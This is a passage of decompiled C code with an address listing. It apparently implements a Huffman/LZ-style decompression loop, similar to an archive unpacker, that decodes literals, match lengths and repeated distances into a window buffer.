							_t360 = E00B743BF(_t684);
							if(_t360 != 0) {
								continue;
							} else {
								goto L98;
							}
						}
						L10:
						_t496 = E00B74E52(_t684);
						__eflags = _t496;
						if(_t496 == 0) {
							goto L97;
						}
						L11:
						_t526 =  *((intOrPtr*)(_t684 + 0x4b3c));
						__eflags = (_t526 -  *(_t684 + 0x7c) &  *(_t684 + 0xe6dc)) - 0x1004;
						if((_t526 -  *(_t684 + 0x7c) &  *(_t684 + 0xe6dc)) >= 0x1004) {
							L17:
							_t344 = E00B6A89D(_t689);
							_t345 =  *(_t684 + 0x124);
							_t633 = _t344 & 0x0000fffe;
							__eflags = _t633 -  *((intOrPtr*)(_t684 + 0xa4 + _t345 * 4));
							if(_t633 >=  *((intOrPtr*)(_t684 + 0xa4 + _t345 * 4))) {
								L19:
								_t671 = 0xf;
								_t346 = _t345 + 1;
								__eflags = _t346 - _t671;
								if(_t346 >= _t671) {
									L25:
									_t499 = _t689[1] + _t671;
									_t348 = _t499 >> 3;
									 *_t689 =  *_t689 + _t348;
									 *(_t697 + 0x10) =  *_t689;
									_t689[1] = _t499 & 0x00000007;
									_t529 = 0x10;
									_t532 =  *((intOrPtr*)(_t684 + 0xe4 + _t671 * 4)) + (_t633 -  *((intOrPtr*)(_t684 + 0xa0 + _t671 * 4)) >> _t529 - _t671);
									__eflags = _t532 -  *((intOrPtr*)(_t684 + 0xa0));
									asm("sbb eax, eax");
									_t349 = _t348 & _t532;
									__eflags = _t349;
									_t672 =  *(_t684 + 0xd28 + _t349 * 2) & 0x0000ffff;
									_t350 =  *(_t697 + 0x10);
									goto L26;
								} else {
									_t625 = _t684 + (_t346 + 0x29) * 4;
									while(1) {
										L21:
										__eflags = _t633 -  *_t625;
										if(_t633 <  *_t625) {
											_t671 = _t346;
											goto L25;
										}
										L22:
										_t346 = _t346 + 1;
										_t625 = _t625 + 4;
										__eflags = _t346 - 0xf;
										if(_t346 < 0xf) {
											continue;
										} else {
											goto L25;
										}
									}
									goto L25;
								}
							} else {
								_t626 = 0x10;
								_t670 = _t633 >> _t626 - _t345;
								_t508 = ( *(_t670 + _t684 + 0x128) & 0x000000ff) + _t689[1];
								 *_t689 =  *_t689 + (_t508 >> 3);
								_t504 = _t508 & 0x00000007;
								_t350 =  *_t689;
								_t689[1] = _t504;
								_t672 =  *(_t684 + 0x528 + _t670 * 2) & 0x0000ffff;
								 *(_t697 + 0x10) = _t350;
								L26:
								_t636 = _t672 & 0x0000ffff;
								__eflags = _t636 - 0x100;
								if(_t636 >= 0x100) {
									L30:
									__eflags = _t636 - 0x106;
									if(_t636 < 0x106) {
										L94:
										__eflags = _t636 - 0x100;
										if(_t636 != 0x100) {
											L100:
											__eflags = _t636 - 0x101;
											if(_t636 != 0x101) {
												L125:
												_t637 = _t636 + 0xfffffefe;
												__eflags = _t637;
												_t535 = _t684 + (_t637 + 0x18) * 4;
												_t501 =  *_t535;
												 *(_t697 + 0x18) = _t501;
												if(_t637 == 0) {
													L127:
													 *(_t684 + 0x60) = _t501;
													_t351 = E00B6A89D(_t689);
													_t352 =  *(_t684 + 0x2de8);
													_t639 = _t351 & 0x0000fffe;
													__eflags = _t639 -  *((intOrPtr*)(_t684 + 0x2d68 + _t352 * 4));
													if(_t639 >=  *((intOrPtr*)(_t684 + 0x2d68 + _t352 * 4))) {
														L129:
														_t673 = 0xf;
														_t353 = _t352 + 1;
														__eflags = _t353 - _t673;
														if(_t353 >= _t673) {
															L135:
															_t538 = _t689[1] + _t673;
															_t539 = _t538 & 0x00000007;
															_t689[1] = _t539;
															_t355 = _t538 >> 3;
															 *_t689 =  *_t689 + _t355;
															 *(_t697 + 0x20) = _t539;
															_t540 = 0x10;
															_t543 =  *((intOrPtr*)(_t684 + 0x2da8 + _t673 * 4)) + (_t639 -  *((intOrPtr*)(_t684 + 0x2d64 + _t673 * 4)) >> _t540 - _t673);
															__eflags = _t543 -  *((intOrPtr*)(_t684 + 0x2d64));
															asm("sbb eax, eax");
															_t356 = _t355 & _t543;
															__eflags = _t356;
															_t357 =  *(_t684 + 0x39ec + _t356 * 2) & 0x0000ffff;
															L136:
															_t674 = _t357 & 0x0000ffff;
															__eflags = _t674 - 8;
															if(_t674 >= 8) {
																_t504 = (_t674 >> 2) - 1;
																_t678 = ((_t674 & 0x00000003 | 0x00000004) << _t504) + 2;
																__eflags = _t504;
																if(_t504 != 0) {
																	_t409 = E00B6A89D(_t689);
																	_t556 = 0x10;
																	_t678 = _t678 + (_t409 >> _t556 - _t504);
																	_t559 =  *(_t697 + 0x20) + _t504;
																	 *_t689 =  *_t689 + (_t559 >> 3);
																	_t560 = _t559 & 0x00000007;
																	__eflags = _t560;
																	_t689[1] = _t560;
																}
															} else {
																_t678 = _t674 + 2;
															}
															__eflags =  *((char*)(_t684 + 0x4c44));
															_t545 =  *(_t697 + 0x18);
															 *(_t684 + 0x74) = _t678;
															if( *((char*)(_t684 + 0x4c44)) == 0) {
																L142:
																_t642 =  *(_t684 + 0x7c);
																_t506 = _t642 - _t545;
																_t359 =  *((intOrPtr*)(_t684 + 0xe6d8)) + 0xffffeffc;
																__eflags = _t506 - _t359;
																if(_t506 >= _t359) {
																	goto L152;
																}
																L143:
																__eflags = _t642 - _t359;
																if(_t642 >= _t359) {
																	goto L152;
																}
																L144:
																_t363 =  *((intOrPtr*)(_t684 + 0x4b40));
																_t512 = _t506 + _t363;
																_t692 = _t642 + _t363;
																_t645 = 8;
																 *(_t684 + 0x7c) = _t642 + _t678;
																__eflags = _t678 - _t645;
																if(_t678 < _t645) {
																	L114:
																	_t525 = _t684 + 0x7c;
																	__eflags = _t678;
																	if(_t678 == 0) {
																		L89:
																		_t689 = _t684 + 4;
																		continue;
																	}
																	L115:
																	_t525 = _t684 + 0x7c;
																	 *_t692 =  *_t512;
																	__eflags = _t678 - 1;
																	if(_t678 <= 1) {
																		goto L89;
																	}
																	L116:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 1)) =  *((intOrPtr*)(_t512 + 1));
																	__eflags = _t678 - 2;
																	if(_t678 <= 2) {
																		goto L89;
																	}
																	L117:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 2)) =  *((intOrPtr*)(_t512 + 2));
																	__eflags = _t678 - 3;
																	if(_t678 <= 3) {
																		goto L89;
																	}
																	L118:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 3)) =  *((intOrPtr*)(_t512 + 3));
																	__eflags = _t678 - 4;
																	if(_t678 <= 4) {
																		goto L89;
																	}
																	L119:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 4)) =  *((intOrPtr*)(_t512 + 4));
																	__eflags = _t678 - 5;
																	if(_t678 <= 5) {
																		goto L89;
																	}
																	L120:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 5)) =  *((intOrPtr*)(_t512 + 5));
																	__eflags = _t678 - 6;
																	if(_t678 <= 6) {
																		goto L89;
																	}
																	L121:
																	_t360 =  *((intOrPtr*)(_t512 + 6));
																	 *((char*)(_t692 + 6)) =  *((intOrPtr*)(_t512 + 6));
																	goto L155;
																}
																L145:
																__eflags = _t545 - _t678;
																if(_t545 >= _t678) {
																	L149:
																	_t372 = _t678 >> 3;
																	__eflags = _t372;
																	 *(_t697 + 0x20) = _t372;
																	_t686 = _t372;
																	do {
																		L150:
																		E00B80320(_t692, _t512, _t645);
																		_t697 = _t697 + 0xc;
																		_t645 = 8;
																		_t512 = _t512 + _t645;
																		_t692 = _t692 + _t645;
																		_t678 = _t678 - _t645;
																		_t686 = _t686 - 1;
																		__eflags = _t686;
																	} while (_t686 != 0);
																	L113:
																	_t684 =  *((intOrPtr*)(_t697 + 0x1c));
																	goto L114;
																}
																L146:
																_t548 = _t678 >> 3;
																__eflags = _t548;
																do {
																	L147:
																	_t678 = _t678 - _t645;
																	 *_t692 =  *_t512;
																	 *((char*)(_t692 + 1)) =  *((intOrPtr*)(_t512 + 1));
																	 *((char*)(_t692 + 2)) =  *((intOrPtr*)(_t512 + 2));
																	 *((char*)(_t692 + 3)) =  *((intOrPtr*)(_t512 + 3));
																	 *((char*)(_t692 + 4)) =  *((intOrPtr*)(_t512 + 4));
																	 *((char*)(_t692 + 5)) =  *((intOrPtr*)(_t512 + 5));
																	 *((char*)(_t692 + 6)) =  *((intOrPtr*)(_t512 + 6));
																	_t381 =  *((intOrPtr*)(_t512 + 7));
																	_t512 = _t512 + _t645;
																	 *((char*)(_t692 + 7)) = _t381;
																	_t692 = _t692 + _t645;
																	_t548 = _t548 - 1;
																	__eflags = _t548;
																} while (_t548 != 0);
																goto L114;
															} else {
																L141:
																_push( *(_t684 + 0xe6dc));
																_push(_t684 + 0x7c);
																_push(_t545);
																L70:
																_push(_t678);
																E00B72C30();
																while(1) {
																	L0:
																	_t684 = __esi;
																	_t525 = __esi + 0x7c;
																	do {
																		do {
																			goto L3;
																			L152:
																			_t525 = _t684 + 0x7c;
																			__eflags = _t678;
																		} while (_t678 == 0);
																		_t360 =  *(_t684 + 0xe6dc);
																		do {
																			L154:
																			_t361 = _t360 & _t506;
																			_t506 = _t506 + 1;
																			 *((char*)( *((intOrPtr*)(_t684 + 0x4b40)) + _t642)) =  *((intOrPtr*)(_t361 +  *((intOrPtr*)(_t684 + 0x4b40))));
																			_t360 =  *(_t684 + 0xe6dc);
																			_t642 =  *(_t684 + 0x7c) + 0x00000001 & _t360;
																			 *(_t684 + 0x7c) = _t642;
																			_t678 = _t678 - 1;
																			__eflags = _t678;
																		} while (_t678 != 0);
																		L155:
																		goto L0;
																		do {
																			while(1) {
																				L0:
																				_t684 = __esi;
																				_t525 = __esi + 0x7c;
																				L1:
																				 *_t525 =  *_t525 &  *(_t684 + 0xe6dc);
																				if( *_t689 <  *((intOrPtr*)(_t684 + 0x88))) {
																					goto L11;
																				} else {
																					_t513 = _t684 + 0x8c;
																					goto L3;
																				}
																			}
																			L96:
																			_t438 = E00B7253E(_t684, _t697 + 0x28);
																			__eflags = _t438;
																		} while (_t438 != 0);
																		goto L97;
																		L90:
																		_t525 = _t684 + 0x7c;
																		__eflags = _t678;
																	} while (_t678 == 0);
																	_t386 =  *(_t684 + 0xe6dc);
																	_t514 =  *(_t697 + 0x20);
																	do {
																		L92:
																		_t387 = _t386 & _t514;
																		_t514 = _t514 + 1;
																		 *((char*)( *((intOrPtr*)(_t684 + 0x4b40)) + _t646)) =  *((intOrPtr*)(_t387 +  *((intOrPtr*)(_t684 + 0x4b40))));
																		_t386 =  *(_t684 + 0xe6dc);
																		_t646 =  *(_t684 + 0x7c) + 0x00000001 & _t386;
																		 *(_t684 + 0x7c) = _t646;
																		_t678 = _t678 - 1;
																		__eflags = _t678;
																	} while (_t678 != 0);
																	goto L155;
																}
															}
														}
														L130:
														_t562 = _t684 + (_t353 + 0xb5a) * 4;
														while(1) {
															L131:
															__eflags = _t639 -  *_t562;
															if(_t639 <  *_t562) {
																break;
															}
															L132:
															_t353 = _t353 + 1;
															_t562 = _t562 + 4;
															__eflags = _t353 - 0xf;
															if(_t353 < 0xf) {
																continue;
															}
															L133:
															goto L135;
														}
														L134:
														_t673 = _t353;
														goto L135;
													}
													L128:
													_t563 = 0x10;
													_t650 = _t639 >> _t563 - _t352;
													_t524 = ( *(_t650 + _t684 + 0x2dec) & 0x000000ff) + _t689[1];
													 *_t689 =  *_t689 + (_t524 >> 3);
													_t504 = _t524 & 0x00000007;
													_t689[1] = _t504;
													_t357 =  *(_t684 + 0x31ec + _t650 * 2) & 0x0000ffff;
													 *(_t697 + 0x20) = _t504;
													goto L136;
												} else {
													goto L126;
												}
												do {
													L126:
													 *_t535 =  *(_t535 - 4);
													_t535 = _t535 - 4;
													_t637 = _t637 - 1;
													__eflags = _t637;
												} while (_t637 != 0);
												goto L127;
											}
											L101:
											_t678 =  *(_t684 + 0x74);
											__eflags = _t678;
											if(_t678 == 0) {
												while(1) {
													L0:
													_t684 = __esi;
													_t525 = __esi + 0x7c;
													goto L1;
												}
											}
											L102:
											__eflags =  *((char*)(_t684 + 0x4c44));
											if( *((char*)(_t684 + 0x4c44)) == 0) {
												L104:
												_t651 =  *(_t684 + 0x7c);
												_t565 =  *(_t684 + 0x60);
												_t417 =  *((intOrPtr*)(_t684 + 0xe6d8)) + 0xffffeffc;
												_t510 = _t651 - _t565;
												__eflags = _t510 - _t417;
												if(_t510 >= _t417) {
													L122:
													_t418 =  *(_t684 + 0xe6dc);
													do {
														L123:
														_t419 = _t418 & _t510;
														_t510 = _t510 + 1;
														 *((char*)( *((intOrPtr*)(_t684 + 0x4b40)) + _t651)) =  *((intOrPtr*)(_t419 +  *((intOrPtr*)(_t684 + 0x4b40))));
														_t418 =  *(_t684 + 0xe6dc);
														_t651 =  *(_t684 + 0x7c) + 0x00000001 & _t418;
														 *(_t684 + 0x7c) = _t651;
														_t678 = _t678 - 1;
														__eflags = _t678;
													} while (_t678 != 0);
													goto L155;
												}
												L105:
												__eflags = _t651 - _t417;
												if(_t651 >= _t417) {
													goto L122;
												}
												L106:
												_t421 =  *((intOrPtr*)(_t684 + 0x4b40));
												_t512 = _t510 + _t421;
												_t692 = _t651 + _t421;
												_t654 = 8;
												 *(_t684 + 0x7c) = _t651 + _t678;
												__eflags = _t678 - _t654;
												if(_t678 < _t654) {
													goto L114;
												}
												L107:
												__eflags = _t565 - _t678;
												if(_t565 >= _t678) {
													L111:
													_t424 = _t678 >> 3;
													__eflags = _t424;
													 *(_t697 + 0x20) = _t424;
													_t688 = _t424;
													do {
														L112:
														E00B80320(_t692, _t512, _t654);
														_t697 = _t697 + 0xc;
														_t654 = 8;
														_t512 = _t512 + _t654;
														_t692 = _t692 + _t654;
														_t678 = _t678 - _t654;
														_t688 = _t688 - 1;
														__eflags = _t688;
													} while (_t688 != 0);
													goto L113;
												}
												L108:
												_t568 = _t678 >> 3;
												__eflags = _t568;
												do {
													L109:
													_t678 = _t678 - _t654;
													 *_t692 =  *_t512;
													 *((char*)(_t692 + 1)) =  *((intOrPtr*)(_t512 + 1));
													 *((char*)(_t692 + 2)) =  *((intOrPtr*)(_t512 + 2));
													 *((char*)(_t692 + 3)) =  *((intOrPtr*)(_t512 + 3));
													 *((char*)(_t692 + 4)) =  *((intOrPtr*)(_t512 + 4));
													 *((char*)(_t692 + 5)) =  *((intOrPtr*)(_t512 + 5));
													 *((char*)(_t692 + 6)) =  *((intOrPtr*)(_t512 + 6));
													_t433 =  *((intOrPtr*)(_t512 + 7));
													_t512 = _t512 + _t654;
													 *((char*)(_t692 + 7)) = _t433;
													_t692 = _t692 + _t654;
													_t568 = _t568 - 1;
													__eflags = _t568;
												} while (_t568 != 0);
												goto L114;
											}
											L103:
											_push( *(_t684 + 0xe6dc));
											_push(_t684 + 0x7c);
											_push( *(_t684 + 0x60));
											goto L70;
										}
										L95:
										_push(_t697 + 0x28);
										_t436 = E00B73F9D(_t684, _t689);
										__eflags = _t436;
										if(_t436 == 0) {
											goto L97;
										}
										goto L96;
									}
									L31:
									_t680 = _t636 - 0x106;
									__eflags = _t680 - 8;
									if(_t680 >= 8) {
										_t441 = (_t680 >> 2) - 1;
										 *(_t697 + 0x20) = _t441;
										_t678 = ((_t680 & 0x00000003 | 0x00000004) << _t441) + 2;
										__eflags = _t441;
										if(_t441 != 0) {
											_t482 = E00B6A89D(_t689);
											_t522 = _t504 +  *(_t697 + 0x20);
											_t616 = 0x10;
											_t678 = _t678 + (_t482 >> _t616 -  *(_t697 + 0x20));
											_t619 =  *(_t697 + 0x10) + (_t522 >> 3);
											_t504 = _t522 & 0x00000007;
											__eflags = _t504;
											 *(_t697 + 0x10) = _t619;
											 *_t689 = _t619;
											_t689[1] = _t504;
										}
									} else {
										 *(_t697 + 0x10) = _t350;
										_t678 = _t680 + 2;
									}
									_t442 = E00B6A89D(_t689);
									_t443 =  *(_t684 + 0x1010);
									_t656 = _t442 & 0x0000fffe;
									__eflags = _t656 -  *((intOrPtr*)(_t684 + 0xf90 + _t443 * 4));
									if(_t656 >=  *((intOrPtr*)(_t684 + 0xf90 + _t443 * 4))) {
										L37:
										_t516 = 0xf;
										_t444 = _t443 + 1;
										__eflags = _t444 - _t516;
										if(_t444 >= _t516) {
											L43:
											_t575 = _t689[1] + _t516;
											_t576 = _t575 & 0x00000007;
											_t689[1] = _t576;
											 *_t689 =  *_t689 + (_t575 >> 3);
											_t447 =  *_t689;
											 *(_t697 + 0x10) = _t576;
											_t577 = 0x10;
											 *(_t697 + 0x14) = _t447;
											_t580 =  *((intOrPtr*)(_t684 + 0xfd0 + _t516 * 4)) + (_t656 -  *((intOrPtr*)(_t684 + 0xf8c + _t516 * 4)) >> _t577 - _t516);
											__eflags = _t580 -  *((intOrPtr*)(_t684 + 0xf8c));
											asm("sbb eax, eax");
											_t448 = _t447 & _t580;
											__eflags = _t448;
											_t449 =  *(_t684 + 0x1c14 + _t448 * 2) & 0x0000ffff;
											goto L44;
										}
										L38:
										_t612 = _t684 + (_t444 + 0x3e4) * 4;
										while(1) {
											L39:
											__eflags = _t656 -  *_t612;
											if(_t656 <  *_t612) {
												break;
											}
											L40:
											_t444 = _t444 + 1;
											_t612 = _t612 + 4;
											__eflags = _t444 - 0xf;
											if(_t444 < 0xf) {
												continue;
											}
											L41:
											goto L43;
										}
										L42:
										_t516 = _t444;
										goto L43;
									} else {
										L36:
										_t613 = 0x10;
										_t666 = _t656 >> _t613 - _t443;
										 *(_t697 + 0x20) = _t666;
										_t668 = ( *(_t666 + _t684 + 0x1014) & 0x000000ff) + _t504;
										_t480 = (_t668 >> 3) +  *(_t697 + 0x10);
										_t669 = _t668 & 0x00000007;
										 *(_t697 + 0x14) = _t480;
										 *_t689 = _t480;
										_t689[1] = _t669;
										 *(_t697 + 0x10) = _t669;
										_t449 =  *(_t684 + 0x1414 +  *(_t697 + 0x20) * 2) & 0x0000ffff;
										L44:
										_t450 = _t449 & 0x0000ffff;
										__eflags = _t450 - 4;
										if(_t450 >= 4) {
											L46:
											_t696 = (_t450 >> 1) - 1;
											_t454 = ((_t450 & 0x00000001 | 0x00000002) << _t696) + 1;
											 *(_t697 + 0x20) = _t454;
											_t504 = _t454;
											 *(_t697 + 0x18) = _t504;
											__eflags = _t696;
											if(_t696 == 0) {
												L63:
												_t689 = _t684 + 4;
												L64:
												__eflags = _t504 - 0x100;
												if(_t504 > 0x100) {
													_t678 = _t678 + 1;
													__eflags = _t504 - 0x2000;
													if(_t504 > 0x2000) {
														_t678 = _t678 + 1;
														__eflags = _t504 - 0x40000;
														if(_t504 > 0x40000) {
															_t678 = _t678 + 1;
															__eflags = _t678;
														}
													}
												}
												 *(_t684 + 0x6c) =  *(_t684 + 0x68);
												 *(_t684 + 0x68) =  *(_t684 + 0x64);
												 *(_t684 + 0x64) =  *(_t684 + 0x60);
												 *(_t684 + 0x60) = _t504;
												__eflags =  *((char*)(_t684 + 0x4c44));
												 *(_t684 + 0x74) = _t678;
												if( *((char*)(_t684 + 0x4c44)) == 0) {
													L71:
													_t646 =  *(_t684 + 0x7c);
													_t551 = _t646 - _t504;
													_t385 =  *((intOrPtr*)(_t684 + 0xe6d8)) + 0xffffeffc;
													 *(_t697 + 0x20) = _t551;
													__eflags = _t551 - _t385;
													if(_t551 >= _t385) {
														goto L90;
													}
													L72:
													__eflags = _t646 - _t385;
													if(_t646 >= _t385) {
														goto L90;
													}
													L73:
													_t389 =  *((intOrPtr*)(_t684 + 0x4b40));
													_t515 = _t389 + _t551;
													_t693 = _t646 + _t389;
													_t649 = 8;
													_t525 = _t684 + 0x7c;
													 *_t525 = _t646 + _t678;
													__eflags = _t678 - _t649;
													if(_t678 < _t649) {
														L81:
														__eflags = _t678;
														if(_t678 != 0) {
															 *_t693 =  *_t515;
															__eflags = _t678 - 1;
															if(_t678 > 1) {
																 *((char*)(_t693 + 1)) =  *((intOrPtr*)(_t515 + 1));
																__eflags = _t678 - 2;
																if(_t678 > 2) {
																	 *((char*)(_t693 + 2)) =  *((intOrPtr*)(_t515 + 2));
																	__eflags = _t678 - 3;
																	if(_t678 > 3) {
																		 *((char*)(_t693 + 3)) =  *((intOrPtr*)(_t515 + 3));
																		__eflags = _t678 - 4;
																		if(_t678 > 4) {
																			 *((char*)(_t693 + 4)) =  *((intOrPtr*)(_t515 + 4));
																			__eflags = _t678 - 5;
																			if(_t678 > 5) {
																				 *((char*)(_t693 + 5)) =  *((intOrPtr*)(_t515 + 5));
																				__eflags = _t678 - 6;
																				if(_t678 > 6) {
																					 *((char*)(_t693 + 6)) =  *((intOrPtr*)(_t515 + 6));
																				}
																			}
																		}
																	}
																}
															}
														}
														goto L89;
													}
													L74:
													__eflags =  *(_t697 + 0x18) - _t678;
													if( *(_t697 + 0x18) >= _t678) {
														L78:
														_t399 = _t678 >> 3;
														__eflags = _t399;
														 *(_t697 + 0x20) = _t399;
														_t687 = _t399;
														do {
															L79:
															E00B80320(_t693, _t515, _t649);
															_t697 = _t697 + 0xc;
															_t649 = 8;
															_t515 = _t515 + _t649;
															_t693 = _t693 + _t649;
															_t678 = _t678 - _t649;
															_t687 = _t687 - 1;
															__eflags = _t687;
														} while (_t687 != 0);
														_t684 =  *((intOrPtr*)(_t697 + 0x1c));
														_t525 =  *(_t697 + 0x24);
														goto L81;
													}
													L75:
													_t554 = _t678 >> 3;
													__eflags = _t554;
													do {
														L76:
														_t678 = _t678 - _t649;
														 *_t693 =  *_t515;
														 *((char*)(_t693 + 1)) =  *((intOrPtr*)(_t515 + 1));
														 *((char*)(_t693 + 2)) =  *((intOrPtr*)(_t515 + 2));
														 *((char*)(_t693 + 3)) =  *((intOrPtr*)(_t515 + 3));
														 *((char*)(_t693 + 4)) =  *((intOrPtr*)(_t515 + 4));
														 *((char*)(_t693 + 5)) =  *((intOrPtr*)(_t515 + 5));
														 *((char*)(_t693 + 6)) =  *((intOrPtr*)(_t515 + 6));
														_t408 =  *((intOrPtr*)(_t515 + 7));
														_t515 = _t515 + _t649;
														 *((char*)(_t693 + 7)) = _t408;
														_t693 = _t693 + _t649;
														_t554 = _t554 - 1;
														__eflags = _t554;
													} while (_t554 != 0);
													_t525 = _t684 + 0x7c;
													goto L81;
												} else {
													L69:
													_push( *(_t684 + 0xe6dc));
													_push(_t684 + 0x7c);
													_push(_t504);
													goto L70;
												}
											}
											L47:
											__eflags = _t696 - 4;
											if(__eflags < 0) {
												L62:
												_t459 = E00B78934(_t684 + 4);
												_t583 = 0x20;
												_t504 = (_t459 >> _t583 - _t696) +  *(_t697 + 0x20);
												_t586 =  *(_t697 + 0x10) + _t696;
												 *(_t697 + 0x18) = _t504;
												_t689 = _t684 + 4;
												 *_t689 = (_t586 >> 3) +  *(_t697 + 0x14);
												_t689[1] = _t586 & 0x00000007;
												goto L64;
											}
											L48:
											if(__eflags <= 0) {
												_t689 = _t684 + 4;
											} else {
												_t475 = E00B78934(_t684 + 4);
												_t605 = 0x24;
												_t504 = (_t475 >> _t605 - _t696 << 4) +  *(_t697 + 0x20);
												_t609 =  *(_t697 + 0x10) + 0xfffffffc + _t696;
												_t689 = _t684 + 4;
												_t665 =  *(_t697 + 0x14) + (_t609 >> 3);
												_t610 = _t609 & 0x00000007;
												 *(_t697 + 0x14) = _t665;
												 *_t689 = _t665;
												 *(_t697 + 0x10) = _t610;
												_t689[1] = _t610;
											}
											_t463 = E00B6A89D(_t689);
											_t464 =  *(_t684 + 0x1efc);
											_t660 = _t463 & 0x0000fffe;
											__eflags = _t660 -  *((intOrPtr*)(_t684 + 0x1e7c + _t464 * 4));
											if(_t660 >=  *((intOrPtr*)(_t684 + 0x1e7c + _t464 * 4))) {
												L53:
												_t589 = 0xf;
												_t465 = _t464 + 1;
												 *(_t697 + 0x18) = _t589;
												__eflags = _t465 - _t589;
												if(_t465 >= _t589) {
													L59:
													_t591 = _t689[1] +  *(_t697 + 0x18);
													 *_t689 =  *_t689 + (_t591 >> 3);
													_t468 =  *(_t697 + 0x18);
													_t689[1] = _t591 & 0x00000007;
													_t593 = 0x10;
													_t596 =  *((intOrPtr*)(_t684 + 0x1ebc + _t468 * 4)) + (_t660 -  *((intOrPtr*)(_t684 + 0x1e78 + _t468 * 4)) >> _t593 - _t468);
													__eflags = _t596 -  *((intOrPtr*)(_t684 + 0x1e78));
													asm("sbb eax, eax");
													_t469 = _t468 & _t596;
													__eflags = _t469;
													_t470 =  *(_t684 + 0x2b00 + _t469 * 2) & 0x0000ffff;
													goto L60;
												}
												L54:
												_t598 = _t684 + (_t465 + 0x79f) * 4;
												while(1) {
													L55:
													__eflags = _t660 -  *_t598;
													if(_t660 <  *_t598) {
														break;
													}
													L56:
													_t465 = _t465 + 1;
													_t598 = _t598 + 4;
													__eflags = _t465 - 0xf;
													if(_t465 < 0xf) {
														continue;
													}
													L57:
													goto L59;
												}
												L58:
												 *(_t697 + 0x18) = _t465;
												goto L59;
											} else {
												L52:
												_t599 = 0x10;
												_t663 = _t660 >> _t599 - _t464;
												_t602 = ( *(_t663 + _t684 + 0x1f00) & 0x000000ff) +  *(_t697 + 0x10);
												 *_t689 = (_t602 >> 3) +  *(_t697 + 0x14);
												_t689[1] = _t602 & 0x00000007;
												_t470 =  *(_t684 + 0x2300 + _t663 * 2) & 0x0000ffff;
												L60:
												_t504 = _t504 + (_t470 & 0x0000ffff);
												__eflags = _t504;
												L61:
												 *(_t697 + 0x18) = _t504;
												goto L64;
											}
										}
										L45:
										_t504 = _t450 + 1;
										goto L61;
									}
								}
								L27:
								__eflags =  *((char*)(_t684 + 0x4c44));
								if( *((char*)(_t684 + 0x4c44)) == 0) {
									 *( *((intOrPtr*)(_t684 + 0x4b40)) +  *(_t684 + 0x7c)) = _t636;
									_t525 = _t684 + 0x7c;
									 *_t525 =  *_t525 + 1;
									continue;
								} else {
									 *(_t684 + 0x7c) =  *(_t684 + 0x7c) + 1;
									 *((char*)(E00B72391(_t684 + 0x4b44,  *(_t684 + 0x7c)))) = _t672 & 0x0000ffff;
									goto L0;
								}
							}
						}
						L12:
						__eflags = _t526 -  *(_t684 + 0x7c);
						if(_t526 ==  *(_t684 + 0x7c)) {
							goto L17;
						}
						L13:
						E00B75202(_t684);
						_t360 =  *(_t684 + 0x4c5c);
						__eflags = _t360 -  *((intOrPtr*)(_t684 + 0x4c4c));
						if(__eflags > 0) {
							goto L98;
						}
						L14:
						if(__eflags < 0) {
							L16:
							__eflags =  *((char*)(_t684 + 0x4c50));
							if( *((char*)(_t684 + 0x4c50)) != 0) {
								L156:
								 *((char*)(_t684 + 0x4c60)) = 0;
								goto L98;
							}
							goto L17;
						}
						L15:
						_t360 =  *(_t684 + 0x4c58);
						__eflags = _t360 -  *((intOrPtr*)(_t684 + 0x4c48));
						if(_t360 >  *((intOrPtr*)(_t684 + 0x4c48))) {
							goto L98;
						}
						goto L16;
					}
				}
			}

0x00b762ca
0x00b762ca
0x00b762ca
0x00b762ca
0x00b762ca
0x00b762cd
0x00b762cd
0x00b762d3
0x00b762de
0x00000000
0x00b762e0
0x00b762e0
0x00000000
0x00b762e0
0x00b762e6
0x00b762e6
0x00b762ef
0x00b762f2
0x00000000
0x00000000
0x00b76301
0x00b76308
0x00b7690f
0x00b76911
0x00b76916
0x00b7691d
0x00b7691d
0x00b7630e
0x00b7630e
0x00b7630f
0x00b76312
0x00b76319
0x00000000
0x00000000
0x00b7631f
0x00b76327
0x00b76328
0x00b76329
0x00b7632a
0x00b76331
0x00000000
0x00b76333
0x00000000
0x00b76333
0x00b76331
0x00b76338
0x00b7633a
0x00b7633f
0x00b76341
0x00000000
0x00000000
0x00b76347
0x00b76347
0x00b76358
0x00b7635d
0x00b7639e
0x00b763a0
0x00b763a7
0x00b763ad
0x00b763b3
0x00b763ba
0x00b763ed
0x00b763ef
0x00b763f0
0x00b763f1
0x00b763f3
0x00b7640c
0x00b7640f
0x00b76416
0x00b76419
0x00b7641f
0x00b76423
0x00b7642f
0x00b7643b
0x00b7643d
0x00b76443
0x00b76445
0x00b76445
0x00b76447
0x00b7644f
0x00000000
0x00b763f5
0x00b763f8
0x00b763fb
0x00b763fb
0x00b763fb
0x00b763fd
0x00b7640a
0x00b7640a
0x00b7640a
0x00b763ff
0x00b763ff
0x00b76400
0x00b76403
0x00b76406
0x00000000
0x00b76408
0x00000000
0x00b76408
0x00b76406
0x00000000
0x00b763fb
0x00b763bc
0x00b763be
0x00b763c1
0x00b763cb
0x00b763d3
0x00b763d6
0x00b763d9
0x00b763dc
0x00b763df
0x00b763e7
0x00b76453
0x00b76453
0x00b7645b
0x00b7645d
0x00b7649d
0x00b7649d
0x00b764a3
0x00b768e6
0x00b768e6
0x00b768e8
0x00b76920
0x00b76920
0x00b76926
0x00b76aab
0x00b76aab
0x00b76aab
0x00b76ab4
0x00b76ab7
0x00b76ab9
0x00b76abd
0x00b76acc
0x00b76ace
0x00b76ad1
0x00b76ad8
0x00b76ade
0x00b76ae4
0x00b76aeb
0x00b76b1b
0x00b76b1d
0x00b76b1e
0x00b76b1f
0x00b76b21
0x00b76b3d
0x00b76b40
0x00b76b44
0x00b76b47
0x00b76b4a
0x00b76b4d
0x00b76b57
0x00b76b5d
0x00b76b69
0x00b76b6b
0x00b76b71
0x00b76b73
0x00b76b73
0x00b76b75
0x00b76b7d
0x00b76b7d
0x00b76b80
0x00b76b83
0x00b76b95
0x00b76b9a
0x00b76b9d
0x00b76b9f
0x00b76ba3
0x00b76baa
0x00b76bb3
0x00b76bb5
0x00b76bbc
0x00b76bbf
0x00b76bbf
0x00b76bc2
0x00b76bc2
0x00b76b85
0x00b76b85
0x00b76b85
0x00b76bc5
0x00b76bcc
0x00b76bd0
0x00b76bd3
0x00b76be5
0x00b76be5
0x00b76bf0
0x00b76bf2
0x00b76bf7
0x00b76bf9
0x00000000
